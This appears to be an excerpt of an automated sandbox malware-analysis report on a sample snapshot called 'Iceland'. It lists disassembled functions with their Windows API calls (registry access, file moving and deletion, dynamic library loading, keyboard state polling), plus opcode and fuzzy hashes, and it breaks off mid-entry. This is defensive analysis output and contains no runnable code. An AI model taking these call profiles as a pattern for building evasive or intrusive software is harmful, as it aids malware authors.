                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                • Opcode ID: c42e02a09ef8544abe7989c69c3da6dbd644f339ed908aa93bd36eebf99d3978
                                                                                                                                                                                                                                                                • Instruction ID: 0645e5f206fdb7ea90079f7403d4fcff6ca99354f791c6b2d79df0fbe1433851
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c42e02a09ef8544abe7989c69c3da6dbd644f339ed908aa93bd36eebf99d3978
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5B14D72E01129ABDF11DBA4CD85EDFBBBDEF49314F0040A6F609E7151EA309B448B61
                                                                                                                                                                                                                                                                Function 00AAADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00AAAE87
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AAAE95
                                                                                                                                                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AAAEC8
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AAB09D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                • Opcode ID: 3dcefd95944172846ab23bfaadbeebd9c9320ab5e38277495c40921d116be934
                                                                                                                                                                                                                                                                • Instruction ID: 8f50afcfe2bc4f3a58321ccda34fd67c8b06eb3caf278858542318d509a2aa5f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dcefd95944172846ab23bfaadbeebd9c9320ab5e38277495c40921d116be934
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8A1BE71A04301AFE724DF28D986B2AB7E5AF48710F14882DF5999B3D2DB71EC41CB91
                                                                                                                                                                                                                                                                Function 00AAC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AAC10E,?,?), ref: 00AAD415
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD451
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4C8
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4FE
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AAC505
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AAC560
                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AAC5C3
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00AAC606
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AAC613
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 826366716-0
                                                                                                                                                                                                                                                                • Opcode ID: 9108c041e8bb9d7a075935e4cc9a2ff01fb563e3f3f924c7dd0f40b98215aeb6
                                                                                                                                                                                                                                                                • Instruction ID: e9b29621db672f8e42068305b15774b148ff9b060356b4b30065bd6d30a9aa2d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9108c041e8bb9d7a075935e4cc9a2ff01fb563e3f3f924c7dd0f40b98215aeb6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D61B331508241AFD714DF18C590E6ABBF5FF85318F54856CF09A8B2A2DB31ED46CB91
                                                                                                                                                                                                                                                                Function 00A8ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A8D7CD,?), ref: 00A8E714
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A8D7CD,?), ref: 00A8E72D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8EAB0: GetFileAttributesW.KERNEL32(?,00A8D840), ref: 00A8EAB1
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00A8ED8A
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00A8EDC3
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8EF02
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8EF1A
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00A8EF67
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                • Opcode ID: 6e881f0dc6ce93135984d8ec81385dd34610e2a43ddde98e13d15bb800ea8ee5
                                                                                                                                                                                                                                                                • Instruction ID: e30b7762a951e52a68512c1035136ed5ae53072440d58822711fe39728ad0af3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e881f0dc6ce93135984d8ec81385dd34610e2a43ddde98e13d15bb800ea8ee5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 215173B25083859BC724EB94DD819DBB7ECEF85350F00092EF685D3151EF71A6888766
                                                                                                                                                                                                                                                                Function 00A89517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00A89534
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 00A895A5
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 00A89604
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A89677
                                                                                                                                                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A896A2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                • Opcode ID: f9ad8da60ef8cfc10e163364a025a56ae97899776bd0341e09f6f919679721cb
                                                                                                                                                                                                                                                                • Instruction ID: 733f04976fb1d617884d804954dceec96b0dd690ecc210b29d722a58ff6d2bdd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9ad8da60ef8cfc10e163364a025a56ae97899776bd0341e09f6f919679721cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2512AB5A0061AEFCB14DF58C884EAAB7F9FF89314B158569E905DB310E734E911CF90
                                                                                                                                                                                                                                                                Function 00A99540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A995F3
                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A9961F
                                                                                                                                                                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A99677
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A9969C
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A996A4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                • Opcode ID: 630102587aaa425160be4e4e26f18e0135c73f60e5b9a55c75e813c83f32aef6
                                                                                                                                                                                                                                                                • Instruction ID: eaeef3a53dd52876b03fef5603deff7097857982f04e02319ad3eada6efcf047
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 630102587aaa425160be4e4e26f18e0135c73f60e5b9a55c75e813c83f32aef6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D513A35A00215AFDF05DF69C981EAABBF5FF48314F058068E949AB362DB35ED41CB90
                                                                                                                                                                                                                                                                Function 00AA9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00AA999D
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00AA9A2D
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00AA9A49
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00AA9A8F
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00AA9AAF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A91A02,?,753CE610), ref: 00A3F9F1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A80354,00000000,00000000,?,?,00A91A02,?,753CE610,?,00A80354), ref: 00A3FA18
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 666041331-0
                                                                                                                                                                                                                                                                • Opcode ID: 477c63d45cb8b98e6c1bcd5ac69116b38bbb3498e33700ee3493ec4f915da237
                                                                                                                                                                                                                                                                • Instruction ID: 9cf24f88d814f60a39c3854debc56aeca667a238d5547e09a12811b7a7cc5460
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 477c63d45cb8b98e6c1bcd5ac69116b38bbb3498e33700ee3493ec4f915da237
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9515C35600215DFCB11DF68C584DAEBBF0FF0A354B0581A9E81A9B762D731ED86CB91
                                                                                                                                                                                                                                                                Function 00AB75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00AB766B
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 00AB7682
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00AB76AB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A9B5BE,00000000,00000000), ref: 00AB76D0
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00AB76FF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                • Opcode ID: 829731c0189cdfe008ad06b128bed0fd0d2c5117f24f621a6b6ce6a7cbf25946
                                                                                                                                                                                                                                                                • Instruction ID: b09c0356165d44046254c373241c771bc143228536e53e01092a96103cdd93c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 829731c0189cdfe008ad06b128bed0fd0d2c5117f24f621a6b6ce6a7cbf25946
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6241E235A08504AFC725CF6CCCA8FED7BA9EB89350F150264F819A72E2D7B0ED51DA50
                                                                                                                                                                                                                                                                Function 00A523C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: 50c57c24bc140b99e8499501a3207ca7f59c0c9a4dc8ee93f0f6db351b30d2ec
                                                                                                                                                                                                                                                                • Instruction ID: ab32dfe0d91cdbe3c9dd23e1c940e2d08ac5705d4742734dbb9e13d1f0a5fe21
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50c57c24bc140b99e8499501a3207ca7f59c0c9a4dc8ee93f0f6db351b30d2ec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F41BE76A002009FCB20DF78C981B5AB7F5FF8A314F1585A8E915EB391D731AD06DB80
                                                                                                                                                                                                                                                                Function 00A219CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00A219E1
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 00A219FE
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00A21A23
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 00A21A3D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                • Opcode ID: d45d578c11df4f739ecb3f0a592e641f18a25a2563ae7754cd7347b62f235443
                                                                                                                                                                                                                                                                • Instruction ID: 7785e93627c887111d270d11ecfd68567f77a702ebebdec3b98e640d36874369
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d45d578c11df4f739ecb3f0a592e641f18a25a2563ae7754cd7347b62f235443
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47417F71A0411AFFDF15DF68D844AEEB774FB15364F20832AE429A2290D7306A91CB91
                                                                                                                                                                                                                                                                Function 00A942B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetInputState.USER32 ref: 00A94310
                                                                                                                                                                                                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A94367
                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00A94390
                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00A9439A
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A943AB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                • Opcode ID: a1af04be26a20d10c21df067c360d7717e6cbb2347535d23337b324f4afa6387
                                                                                                                                                                                                                                                                • Instruction ID: ccbb782c936045697bb917e785c9ee04f89305dc4987f018216bb3316a1555ad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1af04be26a20d10c21df067c360d7717e6cbb2347535d23337b324f4afa6387
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F316370604346DFEF35CBF4D849FB77BE8AB09308F044669E4628B1A1E7A59487CB61
                                                                                                                                                                                                                                                                Function 00A8224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A82262
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 00A8230E
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 00A82316
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 00A82327
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00A8232F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
